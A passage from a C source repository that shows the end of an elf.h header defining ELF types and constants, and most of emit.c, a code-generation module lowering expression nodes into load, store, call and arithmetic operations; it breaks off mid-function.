not, write to the Free 17 | Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 18 | 02111-1307 USA. */ 19 | 20 | #ifndef _ELF_H 21 | #define _ELF_H 1 22 | 23 | /*#include */ 24 | 25 | /*__BEGIN_DECLS*/ 26 | 27 | /* Standard ELF types. */ 28 | 29 | #include 30 | 31 | /* Type for a 16-bit quantity. */ 32 | typedef uint16_t Elf32_Half; 33 | typedef uint16_t Elf64_Half; 34 | 35 | /* Types for signed and unsigned 32-bit quantities. */ 36 | typedef uint32_t Elf32_Word; 37 | typedef int32_t Elf32_Sword; 38 | typedef uint32_t Elf64_Word; 39 | typedef int32_t Elf64_Sword; 40 | 41 | /* Types for signed and unsigned 64-bit quantities. */ 42 | typedef uint64_t Elf32_Xword; 43 | typedef int64_t Elf32_Sxword; 44 | typedef uint64_t Elf64_Xword; 45 | typedef int64_t Elf64_Sxword; 46 | 47 | /* Type of addresses. */ 48 | typedef uint32_t Elf32_Addr; 49 | typedef uint64_t Elf64_Addr; 50 | 51 | /* Type of file offsets. */ 52 | typedef uint32_t Elf32_Off; 53 | typedef uint64_t Elf64_Off; 54 | 55 | /* Type for section indices, which are 16-bit quantities. */ 56 | typedef uint16_t Elf32_Section; 57 | typedef uint16_t Elf64_Section; 58 | 59 | 60 | /* The ELF file header. This appears at the start of every ELF file. */ 61 | 62 | #define EI_NIDENT (16) 63 | 64 | typedef struct 65 | { 66 | unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */ 67 | Elf32_Half e_type; /* Object file type */ 68 | Elf32_Half e_machine; /* Architecture */ 69 | Elf32_Word e_version; /* Object file version */ 70 | Elf32_Addr e_entry; /* Entry point virtual address */ 71 | Elf32_Off e_phoff; /* Program header table file offset */ 72 | Elf32_Off e_shoff; /* Section header table file offset */ 73 | Elf32_Word e_flags; /* Processor-specific flags */ 74 | Elf32_Half e_ehsize; /* ELF header size in bytes */ 75 | Elf32_Half e_phentsize; /* Program header table entry size */ 76 | Elf32_Half e_phnum; /* Program header table entry count */ 77 | Elf32_Half e_shentsize; /* Section header table entry size */ 78 | Elf32_Half e_shnum; /* Section header table entry count */ 79 | Elf32_Half e_shstrndx; /* Section header string table index */ 80 | } Elf32_Ehdr; 81 | 82 | typedef struct 83 | { 84 | unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */ 85 | Elf64_Half e_type; /* Object file type */ 86 | Elf64_Half e_machine; /* Architecture */ 87 | Elf64_Word e_version; /* Object file version */ 88 | Elf64_Addr e_entry; /* Entry point virtual address */ 89 | Elf64_Off e_phoff; /* Program header table file offset */ 90 | Elf64_Off e_shoff; /* Section header table file offset */ 91 | Elf64_Word e_flags; /* Processor-specific flags */ 92 | Elf64_Half e_ehsize; /* ELF header size in bytes */ 93 | Elf64_Half e_phentsize; /* Program header table entry size */ 94 | Elf64_Half e_phnum; /* Program header table entry count */ 95 | Elf64_Half e_shentsize; /* Section header table entry size */ 96 | Elf64_Half e_shnum; /* Section header table entry count */ 97 | Elf64_Half e_shstrndx; /* Section header string table index */ 98 | } Elf64_Ehdr; 99 | 100 | /* Fields in the e_ident array. The EI_* macros are indices into the 101 | array. The macros under each EI_* macro are the values the byte 102 | may have. */ 103 | 104 | #define EI_CLASS 4 /* File class byte index */ 105 | #define ELFCLASSNONE 0 /* Invalid class */ 106 | #define ELFCLASS32 1 /* 32-bit objects */ 107 | #define ELFCLASS64 2 /* 64-bit objects */ 108 | #define ELFCLASSNUM 3 109 | 110 | /* Legal values for e_type (object file type). */ 111 | 112 | #define ET_NONE 0 /* No file type */ 113 | #define ET_REL 1 /* Relocatable file */ 114 | #define ET_EXEC 2 /* Executable file */ 115 | #define ET_DYN 3 /* Shared object file */ 116 | #define ET_CORE 4 /* Core file */ 117 | #define ET_NUM 5 /* Number of defined types */ 118 | #define ET_LOOS 0xfe00 /* OS-specific range start */ 119 | #define ET_HIOS 0xfeff /* OS-specific range end */ 120 | #define ET_LOPROC 0xff00 /* Processor-specific range start */ 121 | #define ET_HIPROC 0xffff /* Processor-specific range end */ 122 | 123 | /* Section header. */ 124 | 125 | typedef struct 126 | { 127 | Elf32_Word sh_name; /* Section name (string tbl index) */ 128 | Elf32_Word sh_type; /* Section type */ 129 | Elf32_Word sh_flags; /* Section flags */ 130 | Elf32_Addr sh_addr; /* Section virtual addr at execution */ 131 | Elf32_Off sh_offset; /* Section file offset */ 132 | Elf32_Word sh_size; /* Section size in bytes */ 133 | Elf32_Word sh_link; /* Link to another section */ 134 | Elf32_Word sh_info; /* Additional section information */ 135 | Elf32_Word sh_addralign; /* Section alignment */ 136 | Elf32_Word sh_entsize; /* Entry size if section holds table */ 137 | } Elf32_Shdr; 138 | 139 | typedef struct 140 | { 141 | Elf64_Word sh_name; /* Section name (string tbl index) */ 142 | Elf64_Word sh_type; /* Section type */ 143 | Elf64_Xword sh_flags; /* Section flags */ 144 | Elf64_Addr sh_addr; /* Section virtual addr at execution */ 145 | Elf64_Off sh_offset; /* Section file offset */ 146 | Elf64_Xword sh_size; /* Section size in bytes */ 147 | Elf64_Word sh_link; /* Link to another section */ 148 | Elf64_Word sh_info; /* Additional section information */ 149 | Elf64_Xword sh_addralign; /* Section alignment */ 150 | Elf64_Xword sh_entsize; /* Entry size if section holds table */ 151 | } Elf64_Shdr; 152 | 153 | /* Special section indices. */ 154 | 155 | #define SHN_UNDEF 0 /* Undefined section */ 156 | #define SHN_LORESERVE 0xff00 /* Start of reserved indices */ 157 | #define SHN_LOPROC 0xff00 /* Start of processor-specific */ 158 | #define SHN_BEFORE 0xff00 /* Order section before all others 159 | (Solaris). */ 160 | #define SHN_AFTER 0xff01 /* Order section after all others 161 | (Solaris). */ 162 | #define SHN_HIPROC 0xff1f /* End of processor-specific */ 163 | #define SHN_LOOS 0xff20 /* Start of OS-specific */ 164 | #define SHN_HIOS 0xff3f /* End of OS-specific */ 165 | #define SHN_ABS 0xfff1 /* Associated symbol is absolute */ 166 | #define SHN_COMMON 0xfff2 /* Associated symbol is common */ 167 | #define SHN_XINDEX 0xffff /* Index is in extra table. */ 168 | #define SHN_HIRESERVE 0xffff /* End of reserved indices */ 169 | 170 | /* Legal values for sh_type (section type). */ 171 | 172 | #define SHT_NULL 0 /* Section header table entry unused */ 173 | #define SHT_PROGBITS 1 /* Program data */ 174 | #define SHT_SYMTAB 2 /* Symbol table */ 175 | #define SHT_STRTAB 3 /* String table */ 176 | #define SHT_RELA 4 /* Relocation entries with addends */ 177 | #define SHT_HASH 5 /* Symbol hash table */ 178 | #define SHT_DYNAMIC 6 /* Dynamic linking information */ 179 | #define SHT_NOTE 7 /* Notes */ 180 | #define SHT_NOBITS 8 /* Program space with no data (bss) */ 181 | #define SHT_REL 9 /* Relocation entries, no addends */ 182 | #define SHT_SHLIB 10 /* Reserved */ 183 | #define SHT_DYNSYM 11 /* Dynamic linker symbol table */ 184 | #define SHT_INIT_ARRAY 14 /* Array of constructors */ 185 | #define SHT_FINI_ARRAY 15 /* Array of destructors */ 186 | #define SHT_PREINIT_ARRAY 16 /* Array of pre-constructors */ 187 | #define SHT_GROUP 17 /* Section group */ 188 | #define SHT_SYMTAB_SHNDX 18 /* Extended section indeces */ 189 | #define SHT_NUM 19 /* Number of defined types. */ 190 | #define SHT_LOOS 0x60000000 /* Start OS-specific */ 191 | #define SHT_GNU_LIBLIST 0x6ffffff7 /* Prelink library list */ 192 | #define SHT_CHECKSUM 0x6ffffff8 /* Checksum for DSO content. */ 193 | #define SHT_LOSUNW 0x6ffffffa /* Sun-specific low bound. */ 194 | #define SHT_SUNW_move 0x6ffffffa 195 | #define SHT_SUNW_COMDAT 0x6ffffffb 196 | #define SHT_SUNW_syminfo 0x6ffffffc 197 | #define SHT_GNU_verdef 0x6ffffffd /* Version definition section. */ 198 | #define SHT_GNU_verneed 0x6ffffffe /* Version needs section. */ 199 | #define SHT_GNU_versym 0x6fffffff /* Version symbol table. */ 200 | #define SHT_HISUNW 0x6fffffff /* Sun-specific high bound. */ 201 | #define SHT_HIOS 0x6fffffff /* End OS-specific type */ 202 | #define SHT_LOPROC 0x70000000 /* Start of processor-specific */ 203 | #define SHT_HIPROC 0x7fffffff /* End of processor-specific */ 204 | #define SHT_LOUSER 0x80000000 /* Start of application-specific */ 205 | #define SHT_HIUSER 0x8fffffff /* End of application-specific */ 206 | 207 | /* Legal values for sh_flags (section flags). */ 208 | 209 | #define SHF_WRITE (1 << 0) /* Writable */ 210 | #define SHF_ALLOC (1 << 1) /* Occupies memory during execution */ 211 | #define SHF_EXECINSTR (1 << 2) /* Executable */ 212 | #define SHF_MERGE (1 << 4) /* Might be merged */ 213 | #define SHF_STRINGS (1 << 5) /* Contains nul-terminated strings */ 214 | #define SHF_INFO_LINK (1 << 6) /* `sh_info' contains SHT index */ 215 | #define SHF_LINK_ORDER (1 << 7) /* Preserve order after combining */ 216 | #define SHF_OS_NONCONFORMING (1 << 8) /* Non-standard OS specific handling 217 | required */ 218 | #define SHF_GROUP (1 << 9) /* Section is member of a group. */ 219 | #define SHF_TLS (1 << 10) /* Section hold thread-local data. */ 220 | #define SHF_MASKOS 0x0ff00000 /* OS-specific. */ 221 | #define SHF_MASKPROC 0xf0000000 /* Processor-specific */ 222 | #define SHF_ORDERED (1 << 30) /* Special ordering requirement 223 | (Solaris). */ 224 | #define SHF_EXCLUDE (1 << 31) /* Section is excluded unless 225 | referenced or allocated (Solaris).*/ 226 | 227 | /* Symbol table entry. */ 228 | 229 | typedef struct 230 | { 231 | Elf32_Word st_name; /* Symbol name (string tbl index) */ 232 | Elf32_Addr st_value; /* Symbol value */ 233 | Elf32_Word st_size; /* Symbol size */ 234 | unsigned char st_info; /* Symbol type and binding */ 235 | unsigned char st_other; /* Symbol visibility */ 236 | Elf32_Section st_shndx; /* Section index */ 237 | } Elf32_Sym; 238 | 239 | typedef struct 240 | { 241 | Elf64_Word st_name; /* Symbol name (string tbl index) */ 242 | unsigned char st_info; /* Symbol type and binding */ 243 | unsigned char st_other; /* Symbol visibility */ 244 | Elf64_Section st_shndx; /* Section index */ 245 | Elf64_Addr st_value; /* Symbol value */ 246 | Elf64_Xword st_size; /* Symbol size */ 247 | } Elf64_Sym; 248 | 249 | /* How to extract and insert information held in the st_info field. */ 250 | 251 | #define ELF32_ST_BIND(val) (((unsigned char) (val)) >> 4) 252 | #define ELF32_ST_TYPE(val) ((val) & 0xf) 253 | #define ELF32_ST_INFO(bind, type) (((bind) << 4) + ((type) & 0xf)) 254 | 255 | /* Both Elf32_Sym and Elf64_Sym use the same one-byte st_info field. */ 256 | #define ELF64_ST_BIND(val) ELF32_ST_BIND (val) 257 | #define ELF64_ST_TYPE(val) ELF32_ST_TYPE (val) 258 | #define ELF64_ST_INFO(bind, type) ELF32_ST_INFO ((bind), (type)) 259 | 260 | /* Legal values for ST_BIND subfield of st_info (symbol binding). */ 261 | 262 | #define STB_LOCAL 0 /* Local symbol */ 263 | #define STB_GLOBAL 1 /* Global symbol */ 264 | #define STB_WEAK 2 /* Weak symbol */ 265 | #define STB_NUM 3 /* Number of defined types. */ 266 | #define STB_LOOS 10 /* Start of OS-specific */ 267 | #define STB_HIOS 12 /* End of OS-specific */ 268 | #define STB_LOPROC 13 /* Start of processor-specific */ 269 | #define STB_HIPROC 15 /* End of processor-specific */ 270 | 271 | /* Legal values for ST_TYPE subfield of st_info (symbol type). */ 272 | 273 | #define STT_NOTYPE 0 /* Symbol type is unspecified */ 274 | #define STT_OBJECT 1 /* Symbol is a data object */ 275 | #define STT_FUNC 2 /* Symbol is a code object */ 276 | #define STT_SECTION 3 /* Symbol associated with a section */ 277 | #define STT_FILE 4 /* Symbol's name is file name */ 278 | #define STT_COMMON 5 /* Symbol is a common data object */ 279 | #define STT_TLS 6 /* Symbol is thread-local data object*/ 280 | #define STT_NUM 7 /* Number of defined types. */ 281 | #define STT_LOOS 10 /* Start of OS-specific */ 282 | #define STT_HIOS 12 /* End of OS-specific */ 283 | #define STT_LOPROC 13 /* Start of processor-specific */ 284 | #define STT_HIPROC 15 /* End of processor-specific */ 285 | 286 | 287 | /* Program segment header. */ 288 | 289 | typedef struct 290 | { 291 | Elf32_Word p_type; /* Segment type */ 292 | Elf32_Off p_offset; /* Segment file offset */ 293 | Elf32_Addr p_vaddr; /* Segment virtual address */ 294 | Elf32_Addr p_paddr; /* Segment physical address */ 295 | Elf32_Word p_filesz; /* Segment size in file */ 296 | Elf32_Word p_memsz; /* Segment size in memory */ 297 | Elf32_Word p_flags; /* Segment flags */ 298 | Elf32_Word p_align; /* Segment alignment */ 299 | } Elf32_Phdr; 300 | 301 | typedef struct 302 | { 303 | Elf64_Word p_type; /* Segment type */ 304 | Elf64_Word p_flags; /* Segment flags */ 305 | Elf64_Off p_offset; /* Segment file offset */ 306 | Elf64_Addr p_vaddr; /* Segment virtual address */ 307 | Elf64_Addr p_paddr; /* Segment physical address */ 308 | Elf64_Xword p_filesz; /* Segment size in file */ 309 | Elf64_Xword p_memsz; /* Segment size in memory */ 310 | Elf64_Xword p_align; /* Segment alignment */ 311 | } Elf64_Phdr; 312 | 313 | /* Legal values for p_type (segment type). */ 314 | 315 | #define PT_NULL 0 /* Program header table entry unused */ 316 | #define PT_LOAD 1 /* Loadable program segment */ 317 | #define PT_DYNAMIC 2 /* Dynamic linking information */ 318 | #define PT_INTERP 3 /* Program interpreter */ 319 | #define PT_NOTE 4 /* Auxiliary information */ 320 | #define PT_SHLIB 5 /* Reserved */ 321 | #define PT_PHDR 6 /* Entry for header table itself */ 322 | #define PT_TLS 7 /* Thread-local storage segment */ 323 | #define PT_NUM 8 /* Number of defined types */ 324 | #define PT_LOOS 0x60000000 /* Start of OS-specific */ 325 | #define PT_GNU_EH_FRAME 0x6474e550 /* GCC .eh_frame_hdr segment */ 326 | #define PT_GNU_STACK 0x6474e551 /* Indicates stack executability */ 327 | #define PT_GNU_RELRO 0x6474e552 /* Read-only after relocation */ 328 | #define PT_LOSUNW 0x6ffffffa 329 | #define PT_SUNWBSS 0x6ffffffa /* Sun Specific segment */ 330 | #define PT_SUNWSTACK 0x6ffffffb /* Stack segment */ 331 | #define PT_HISUNW 0x6fffffff 332 | #define PT_HIOS 0x6fffffff /* End of OS-specific */ 333 | #define PT_LOPROC 0x70000000 /* Start of processor-specific */ 334 | #define PT_HIPROC 0x7fffffff /* End of processor-specific */ 335 | 336 | /* Legal values for p_flags (segment flags). */ 337 | 338 | #define PF_X (1 << 0) /* Segment is executable */ 339 | #define PF_W (1 << 1) /* Segment is writable */ 340 | #define PF_R (1 << 2) /* Segment is readable */ 341 | #define PF_MASKOS 0x0ff00000 /* OS-specific */ 342 | #define PF_MASKPROC 0xf0000000 /* Processor-specific */ 343 | 344 | /*__END_DECLS*/ 345 | 346 | #endif /* elf.h */ 347 | -------------------------------------------------------------------------------- /emit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "config.h" 5 | #include "util.h" 6 | #include "emit.h" 7 | #include "code.h" 8 | #include "symtab.h" 9 | #include "backend.h" 10 | 11 | 12 | struct call_node * 13 | alloc_call_node(void) 14 | { 15 | struct call_node *n = xmalloc(sizeof(struct call_node)); 16 | n->next = NULL; 17 | n->type = NODE_CALL; 18 | n->inverse = 0; 19 | return n; 20 | } 21 | 22 | 23 | struct imm_node * 24 | alloc_imm_node(void) 25 | { 26 | struct imm_node *n = xmalloc(sizeof(struct imm_node)); 27 | n->next = NULL; 28 | n->type = NODE_IMM; 29 | n->inverse = 0; 30 | return n; 31 | } 32 | 33 | 34 | struct lval_node * 35 | alloc_lval_node(void) 36 | { 37 | struct lval_node *n = xmalloc(sizeof(struct lval_node)); 38 | n->next = NULL; 39 | n->type = NODE_LVAL; 40 | n->inverse = 0; 41 | return n; 42 | } 43 | 44 | 45 | struct or_node * 46 | alloc_or_node(void) 47 | { 48 | struct or_node *n = xmalloc(sizeof(struct or_node)); 49 | n->next = NULL; 50 | n->type = NODE_OR; 51 | n->inverse = 0; 52 | return n; 53 | } 54 | 55 | 56 | struct xor_node * 57 | alloc_xor_node(void) 58 | { 59 | struct xor_node *n = xmalloc(sizeof(struct xor_node)); 60 | n->next = NULL; 61 | n->type = NODE_XOR; 62 | n->inverse = 0; 63 | return n; 64 | } 65 | 66 | 67 | struct and_node * 68 | alloc_and_node(void) 69 | { 70 | struct and_node *n = xmalloc(sizeof(struct and_node)); 71 | n->next = NULL; 72 | n->type = NODE_AND; 73 | n->inverse = 0; 74 | return n; 75 | } 76 | 77 | 78 | struct add_node * 79 | alloc_add_node(void) 80 | { 81 | struct add_node *n = xmalloc(sizeof(struct add_node)); 82 | n->next = NULL; 83 | n->type = NODE_ADD; 84 | n->inverse = 0; 85 | return n; 86 | } 87 | 88 | 89 | struct mul_node * 90 | alloc_mul_node(void) 91 | { 92 | struct mul_node *n = xmalloc(sizeof(struct mul_node)); 93 | n->next = NULL; 94 | n->type = NODE_MUL; 95 | n->inverse = 0; 96 | return n; 97 | } 98 | 99 | 100 | void 101 | free_nodes(struct node *n) 102 | { 103 | while (n) { 104 | struct node *next = n->next; 105 | switch (n->type) { 106 | case NODE_IMM: { 107 | struct imm_node *p = (struct imm_node *)n; 108 | free(p->value); 109 | break; 110 | } 111 | case NODE_LVAL: { 112 | struct lval_node *p = (struct lval_node *)n; 113 | free(p->name); 114 | break; 115 | } 116 | case NODE_CALL: { 117 | struct call_node *p = (struct call_node *)n; 118 | free(p->func); 119 | if (p->parm) { 120 | free_nodes(p->parm); 121 | } 122 | break; 123 | } 124 | case NODE_OR: { 125 | struct or_node *p = (struct or_node *)n; 126 | if (p->list) { 127 | free_nodes(p->list); 128 | } 129 | break; 130 | } 131 | case NODE_XOR: { 132 | struct xor_node *p = (struct xor_node *)n; 133 | if (p->list) { 134 | free_nodes(p->list); 135 | } 136 | break; 137 | } 138 | case NODE_AND: { 139 | struct and_node *p = (struct and_node *)n; 140 | if (p->list) { 141 | free_nodes(p->list); 142 | } 143 | break; 144 | } 145 | case NODE_ADD: { 146 | struct add_node *p = (struct add_node *)n; 147 | if (p->list) { 148 | free_nodes(p->list); 149 | } 150 | break; 151 | } 152 | case NODE_MUL: { 153 | struct mul_node *p = (struct mul_node *)n; 154 | if (p->list) { 155 | free_nodes(p->list); 156 | } 157 | break; 158 | } 159 | } 160 | free(n); 161 | n = next; 162 | } 163 | } 164 | 165 | 166 | #ifdef DATA_DEBUG 167 | #include 168 | 169 | 170 | #define show(args...) do { if (level) printf("%*c", level * 2, ' '); printf(args); } while (0) 171 | 172 | 173 | void 174 | walk_nodes(struct node *n, int level) 175 | { 176 | while (n) { 177 | switch (n->type) { 178 | case NODE_IMM: { 179 | struct imm_node *p = (struct imm_node *)n; 180 | show(";== imm %s\n", p->value); 181 | break; 182 | } 183 | case NODE_LVAL: { 184 | struct lval_node *p = (struct lval_node *)n; 185 | show(";== lval %s%s\n", p->deref ? "*" : "", p->name); 186 | break; 187 | } 188 | case NODE_CALL: { 189 | struct call_node *p = (struct call_node *)n; 190 | show(";== %s(\n", p->func); 191 | if (p->parm) { 192 | walk_nodes(p->parm, level + 1); 193 | } 194 | show(")\n"); 195 | break; 196 | } 197 | case NODE_OR: { 198 | struct or_node *p = (struct or_node *)n; 199 | if (p->list) { 200 | show(";== |(\n"); 201 | walk_nodes(p->list, level + 1); 202 | show(")\n"); 203 | } 204 | break; 205 | } 206 | case NODE_XOR: { 207 | struct xor_node *p = (struct xor_node *)n; 208 | if (p->list) { 209 | show(";== ^(\n"); 210 | walk_nodes(p->list, level + 1); 211 | show(")\n"); 212 | } 213 | break; 214 | } 215 | case NODE_AND: { 216 | struct and_node *p = (struct and_node *)n; 217 | if (p->list) { 218 | show(";== &(\n"); 219 | walk_nodes(p->list, level + 1); 220 | show(")\n"); 221 | } 222 | break; 223 | } 224 | case NODE_ADD: { 225 | struct add_node *p = (struct add_node *)n; 226 | if (p->list) { 227 | show(";== +(\n"); 228 | walk_nodes(p->list, level + 1); 229 | show(")\n"); 230 | } 231 | break; 232 | } 233 | case NODE_MUL: { 234 | struct mul_node *p = (struct mul_node *)n; 235 | if (p->list) { 236 | show(";== .(\n"); 237 | walk_nodes(p->list, level + 1); 238 | show(")\n"); 239 | } 240 | break; 241 | } 242 | } 243 | n = n->next; 244 | } 245 | } 246 | #endif 247 | 248 | 249 | static BOOL 250 | is_loadable_sym(const char *name) 251 | { 252 | enum use_t u = get_symbol_used(name); 253 | if (u != UNUSED) { 254 | if (u == CLOBBERED) { 255 | // XXX gets reported twice 256 | cry("symbol '%s' should be volatile\n", name); 257 | } 258 | return FALSE; 259 | } 260 | if (try_symbol_attr(name) & ATTRIB_VOLATILE) { 261 | return FALSE; 262 | } 263 | return TRUE; 264 | } 265 | 266 | 267 | static int 268 | is_loadable(struct node *n, BOOL allow_deref) 269 | { 270 | struct lval_node *p = (struct lval_node *)n; 271 | if (!is_loadable_sym(p->name)) { 272 | return 0; 273 | } 274 | if (p->deref && !allow_deref) { 275 | return 0; 276 | } 277 | if (!p->deref && try_symbol_extern(p->name)) { 278 | cry("symbol '%s' is actually an address\n", p->name); 279 | return -1; 280 | } 281 | return 1; 282 | } 283 | 284 | 285 | static int 286 | get_regparm(struct call_node *n) 287 | { 288 | int regparm; 289 | if ((n->attr & ATTRIB_REGPARM) && n->regparm >= 0) { 290 | return n->regparm; 291 | } 292 | regparm = try_symbol_regparm(n->func); 293 | if (regparm >= 0) { 294 | return regparm; 295 | } 296 | return arch_regparm; 297 | } 298 | 299 | 300 | static void 301 | maybe_symbol_forward(const char *arg) 302 | { 303 | char *tmp = copy_address_sym(arg); 304 | if (tmp) { 305 | add_symbol_forward(tmp, 0); 306 | if (try_symbol_extern(tmp)) { 307 | die("symbol '%s' is actually an address\n", tmp); 308 | } 309 | if (try_symbol_attr(tmp) & ATTRIB_CONSTANT) { 310 | cry("taking address of constant variable '%s'\n", tmp); 311 | } 312 | free(tmp); 313 | } 314 | } 315 | 316 | 317 | void 318 | emit_nodes(struct node *n, const char *assignto, BOOL force, BOOL inloop) 319 | { 320 | char *fast = NULL; 321 | 322 | assert(n); 323 | 324 | if (n->next == NULL && n->type != NODE_CALL && !assignto && !force) { 325 | /* do not emit single node, unless it is a call or we really need it */ 326 | cry("statement with no effect\n"); 327 | return; 328 | } 329 | switch (n->type) { 330 | case NODE_IMM: { 331 | fast = AS_IMM(n)->value; 332 | maybe_symbol_forward(fast); 333 | if (force) { 334 | cry("constant expression '%s' in conditional\n", fast); 335 | } 336 | assert(!assignto); 337 | break; 338 | } 339 | case NODE_LVAL: { 340 | struct lval_node *p = AS_LVAL(n); 341 | int loadable = is_loadable(n, TRUE); 342 | if (loadable < 0) { 343 | fast = p->name; 344 | } else if (loadable > 0) { 345 | make_symbol_used(p->name); 346 | emit_load_direct(p->name, p->deref); 347 | } else { 348 | emit_load_indirect(p->name, p->deref); 349 | } 350 | break; 351 | } 352 | case NODE_CALL: { 353 | struct call_node *p = AS_CALL(n); 354 | struct node *parm; 355 | int deref0 = 0; 356 | char *args[MAX_FUNC_ARGS]; 357 | char *func = p->func; 358 | int i; 359 | int regparm = get_regparm(p); 360 | BOOL retval = (n->next != NULL) || force || assignto; 361 | BOOL direct = FALSE; 362 | memset(args, 0, sizeof(args)); 363 | for (i = 0, parm = p->parm; parm; parm = parm->next, i++) { 364 | BOOL r0 = (i == 0 && regparm > 0); 365 | assert(i < MAX_FUNC_ARGS); 366 | if (parm->type == NODE_IMM) { 367 | args[i] = xstrdup(AS_IMM(parm)->value); 368 | maybe_symbol_forward(args[i]); 369 | } else if (parm->type == NODE_LVAL && is_loadable(parm, r0)) { 370 | struct lval_node *q = AS_LVAL(parm); 371 | args[i] = xstrdup(q->name); 372 | make_symbol_used(args[i]); 373 | if (q->deref) { 374 | deref0 = 1; 375 | } 376 | } else if (r0 && parm->next == NULL && is_loadable_sym(func)) { 377 | args[i] = NULL; 378 | direct = TRUE; 379 | emit_nodes(parm, NULL, TRUE, inloop); 380 | } else if (r0 && parm->type == NODE_LVAL) { 381 | struct lval_node *q = AS_LVAL(parm); 382 | args[i] = create_address_str(q->name, 0); 383 | deref0 = 1; 384 | if (q->deref) { 385 | deref0++; 386 | } 387 | } else { 388 | args[i] = new_name("var"); 389 | emit_nodes(parm, args[i], FALSE, inloop); 390 | make_symbol_used(args[i]); 391 | } 392 | } 393 | if (retval && (p->attr & ATTRIB_NORETURN)) { 394 | cry("function '%s' does not return\n", func); 395 | } 396 | if (!is_loadable_sym(func)) { 397 | char *ptr = new_name("ptr"); 398 | emit_load_indirect(func, FALSE); 399 | add_symbol_forward(ptr, 0); 400 | emit_store_indirect(ptr); 401 | func = ptr; 402 | } else { 403 | func = xstrdup(func); 404 | } 405 | make_symbol_used(func); 406 | if (!(p->attr & ATTRIB_NORETURN)) { 407 | if ((p->attr & ATTRIB_STACK) || inloop) { 408 | if (!(p->attr & ATTRIB_STACK)) { 409 | cry("reserved [[stack]] for '%s' because of loop\n", func); 410 | } 411 | mark_all_used(PROTECTED); 412 | } else { 413 | mark_all_used(CLOBBERED); 414 | } 415 | } 416 | if (direct) { 417 | emit_call(func, NULL, 1, deref0, inloop, retval, p->attr, regparm, p->restack); 418 | } else { 419 | emit_call(func, args, i, deref0, inloop, retval, p->attr, regparm, p->restack); 420 | } 421 | free(func); 422 | while (--i >= 0) { 423 | free(args[i]); 424 | } 425 | break; 426 | } 427 | case NODE_MUL: 428 | case NODE_OR: 429 | case NODE_XOR: 430 | case NODE_AND: 431 | case NODE_ADD: { 432 | struct node *term; 433 | struct node *prev; 434 | int deref0 = 0; 435 | char *prev_tmp; 436 | prev = AS_ADD(n)->list; 437 | if (prev->type == NODE_IMM) { 438 | prev_tmp = xstrdup(AS_IMM(prev)->value); 439 | maybe_symbol_forward(prev_tmp); 440 | } else if (prev->type == NODE_LVAL && is_loadable(prev, TRUE)) { 441 | prev_tmp = xstrdup(AS_LVAL(prev)->name); 442 | make_symbol_used(prev_tmp); 443 | if (AS_LVAL(prev)->deref) { 444 | deref0 = TRUE; 445 | } 446 | } else if (prev->type == NODE_LVAL) { 447 | prev_tmp = create_address_str(AS_LVAL(prev)->name, 0); 448 | deref0 = 1; 449 | if (AS_LVAL(prev)->deref) { 450 | deref0++; 451 | } 452 | } else { 453 | prev_tmp = new_name("var"); 454 | emit_nodes(prev, prev_tmp, FALSE, inloop); 455 | make_symbol_used(prev_tmp); 456 | } 457 | for (term = prev->next; term; term = term->next) { 458 | BOOL swap = FALSE; 459 | char *tmp; 460 | char *sum = new_name("sum"); 461 | if (term->type == NODE_IMM) { 462 | tmp = xstrdup(AS_IMM(term)->value); 463 | maybe_symbol_forward(tmp); 464 | } else if (term->type == NODE_LVAL && is_loadable(term, !deref0) && !(term->inverse && AS_LVAL(term)->deref)) { 465 | tmp = xstrdup(AS_LVAL(term)->name); 466 | make_symbol_used(tmp); 467 | if (AS_LVAL(term)->deref) { 468 | swap = TRUE; 469 | deref0 = 1; 470 | } 471 | } else if (term->type == NODE_LVAL && !deref0 && !term->inverse) { 472 | tmp = create_address_str(AS_LVAL(term)->name, 0); 473 | swap = TRUE; 474 | deref0 = 1; 475 | if (AS_LVAL(term)->deref) { 476 | deref0++; 477 | } 478 | } else { 479 | tmp = new_name("var"); 480 | emit_nodes(term, tmp, FALSE, inloop); 481 | make_symbol_used(tmp); 482 | } 483 | if (n->type == NODE_MUL) { 484 | if (term->inverse) { 485 | emit_div(prev_tmp, tmp, deref0); 486 | } else { 487 | emit_mul(prev_tmp, tmp, deref0, swap); 488 | } 489 | } else if (n->type == NODE_OR) { 490 | emit_or(prev_tmp, tmp, deref0, swap); 491 | } else if (n->type == NODE_XOR) { 492 | emit_xor(prev_tmp, tmp, deref0, swap); 493 | } else if (n->type == NODE_AND) { 494 | emit_and(prev_tmp, tmp, deref0, swap); 495 | } else { 496 | if (term->inverse) { 497 | emit_sub(prev_tmp, tmp, deref0); 498 | } else { 499 | emit_add(prev_tmp, tmp, deref0, swap); 500 | } 501 | } 502 | deref0 = 0; 503 | if (term->next) { 504 | add_symbol_forward(sum, 0); 505 | emit_store_indirect(sum); 506 | make_symbol_used(sum); 507 | } 508 | free(prev_tmp); 509 | prev_tmp = sum; 510 | free(tmp); 511 | } 512 | free(prev_tmp); 513 | break; 514 | } 515 | } 516 | if (assignto) { 517 | add_symbol_forward(assignto, 0); 518 | emit_store_indirect(assignto); 519 | } else { 520 | BOOL loaded = FALSE; 521 | for (n = n->next; n; n = n->next) { 522 | BOOL later = FALSE; 523 | struct lval_node *p = AS_LVAL(n); 524 | assert(n->type == NODE_LVAL); 525 | if (fast) { 526 | if (optimize_imm && !p->deref && !get_symbol(p->name) && ((p->attr & ATTRIB_CONSTANT) || !inloop)) { 527 | emit_fast(p->name, fast); 528 | add_symbol_defined(p->name, fast, p->attr); 529 | continue; 530 | } 531 | if (!loaded) { 532 | loaded = TRUE; 533 | if (p->deref && !is_loadable_sym(p->name)) { 534 | later = TRUE; 535 | } else { 536 | emit_load_direct(fast, FALSE); 537 | } 538 | } 539 | } 540 | if (p->attr & ATTRIB_CONSTANT) { 541 | cry("useless const for '%s'\n", p->name); 542 | } 543 | if (p->deref) { 544 | /* XXX only addresses (imports/vectors) can be derefed */ 545 | if (!is_loadable_sym(p->name)) { 546 | /* XXX ok, this is very very shitty 547 | * tip1: store value to tmp_N for each future p->deref at once 548 | * tip2: calculate in advance how many derefs we will need and store pointers before calculating r0 (see above) 549 | */ 550 | char *ptr = new_name("ptr"); 551 | char *tmp; 552 | if (!later) { 553 | tmp = emit_save(); 554 | } 555 | emit_load_indirect(p->name, FALSE); 556 | emit_store_indirect(ptr); 557 | if (!later) { 558 | emit_restore(tmp); 559 | } else { 560 | emit_load_direct(fast, FALSE); 561 | 